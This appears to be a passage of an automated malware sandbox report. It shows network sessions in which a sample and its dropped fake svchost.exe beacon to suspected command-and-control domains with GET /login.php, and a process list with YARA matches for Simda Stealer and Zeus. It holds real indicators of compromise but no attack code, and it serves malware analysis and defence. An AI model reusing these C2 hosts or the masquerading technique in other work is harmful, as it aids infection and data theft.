Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 54645 | 188.114.96.3 | 443 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:50:49 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Connection: Keep-Alive
2024-11-11 17:50:49 UTC | 947 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:49 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDqhFSckBbMMdt1%2Bi4C%2FqqQT7kNz4hBElXo2xCReegjuNyLnNPmKUuEkivTFKU5ay7HyVs6snzcpqD4EcqTCe9278BHYCA04YUV%2FG71W4PY%2BNij7YhvNA8hF0dFFcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10207558b76ac9-BOS
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6915&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=415197&cwnd=32&unsent_bytes=0&cid=a4bbf1a6f1330493&ts=834&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 54647 | 75.2.71.199 | 443 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:50:49 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com
                                                                                                                                                                                                                  Connection: Keep-Alive
2024-11-11 17:50:49 UTC | 352 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                                  Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:49 GMT
                                                                                                                                                                                                                  Etag: "75apqkf46g19wv"
                                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                                  Server: awselb/2.0
                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                  X-Powered-By: Next.js
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                                  Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                                  Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                                  Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                                  Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.6  54664        188.114.96.3    443               1112  C:\Windows\apppatch\svchost.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-11 17:50:50 UTC  267                OUT        GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
2024-11-11 17:50:51 UTC  953                IN         HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:50:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MYr8LF0YWpKwE%2FeGgprbyoxD3mDw%2FFuiiBCLXrs092U9A%2FGelKYQNWQBm0fQkPz8ck1%2B7o7Qg2%2BuzcuNa5NagmuRU9DeRnWQQ8ACGqyOCyIUvfMyaOhi49TP%2BtD1Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e10207ffc1f0cc2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1284&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2028011&cwnd=249&unsent_bytes=0&cid=942c420829deedf4&ts=853&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 54680 | 188.114.97.3 | 443 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:50:53 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
                                                                                                                                                                                                                  Connection: Keep-Alive
2024-11-11 17:50:54 UTC | 1089 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:54 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  server-timing: amp_sanitizer;dur="90.8",amp_style_sanitizer;dur="32.6",amp_tag_and_attribute_sanitizer;dur="39.0",amp_optimizer;dur="47.5"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8ultcjbx3qKLlX7JzQcZTiaAgUQn5JYgMW%2BlgO7FvjBtam1P5Gk%2BIlqhzhKPDxHZt%2BRbr0fATGL8vwxCpQpVq0zfeHcoYyL%2FzU6JxaeaMc8RVBHr8BeIQXdnu3iSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10208e7937ac0f-YYZ
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=11900&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=242993&cwnd=38&unsent_bytes=0&cid=0d3acfbefe145dc7&ts=1588&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
8 | 192.168.2.6 | 54701 | 188.114.97.3 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:50:55 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
                                                                                                                                                                                                                  Connection: Keep-Alive
2024-11-11 17:50:58 UTC | 1103 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:58 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  server-timing: amp_sanitizer;dur="109.1",amp_style_sanitizer;dur="45.7",amp_tag_and_attribute_sanitizer;dur="32.8",amp_optimizer;dur="56.7"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3H2%2FQjfCttD5TNIeL0%2Bepi4c4dg%2BVPfIBejVpsSiDzkqwtjQfEUEPO%2BRz%2F07iF7taOeeQ%2FIwk9ed3Qi53DT1HiVaxHoLlcZ%2F8WmvUTOWf%2F6MDci8ij%2FhFftfQx4%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10209e4e4e0c7a-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1167&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2177443&cwnd=251&unsent_bytes=0&cid=824806930f275890&ts=2431&x=0"
                                                                                                                                                                                                                  Data Ascii: able-ar{display:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:
                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC1369INData Raw: 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d
                                                                                                                                                                                                                  Data Ascii: html-notbuilt:not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-im
                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC1369INData Raw: 6d 70 6f 72 74 61 6e 74 3b 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b
                                                                                                                                                                                                                  Data Ascii: mportant;bottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{back
                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC1369INData Raw: 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65
                                                                                                                                                                                                                  Data Ascii: ant;overflow:hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 52171 | 188.114.96.3 | 443 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:51:08 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
2024-11-11 17:51:09 UTC | 956 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:51:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2BjkOH46Ad7pds8uH%2FYqKlYGA9iz3%2FTkRCsONZ6WSREcNM%2FpFMR1K0UJv8DH9lJ4mRuEBEbLQZBczqOo3%2BrB7SHivU3MjxTKmTnPeJSZk2PjevX%2FL0T0Sh8%2BgQFqfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1020f139fe5e82-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1399&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2019525&cwnd=250&unsent_bytes=0&cid=0dba1a167853490a&ts=1011&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 50210 | 99.83.170.3 | 443 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:51:09 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com
Connection: Keep-Alive
2024-11-11 17:51:09 UTC | 352 | IN | HTTP/1.1 200 OK
Alt-Svc: h3=":443"; ma=2592000
Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Mon, 11 Nov 2024 17:51:09 GMT
Etag: "ua6lz52rn119wv"
Server: Caddy
Server: awselb/2.0
Vary: Accept-Encoding
X-Powered-By: Next.js
Connection: close
Transfer-Encoding: chunked



                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                  Start time:12:50:23
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\UMwpXhA46R.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\UMwpXhA46R.exe"
                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                  File size:1'179'648 bytes
                                                                                                                                                                                                                  MD5 hash:239B74D7AC38014E61CC335630AC22D6
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                  Start time:12:50:24
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                  File size:1'179'648 bytes
                                                                                                                                                                                                                  MD5 hash:E132561B9EE04A2EDDF6460BE4A89362
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2774994198.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3416553301.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2809572996.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2784640433.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2575291599.000000000F380000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
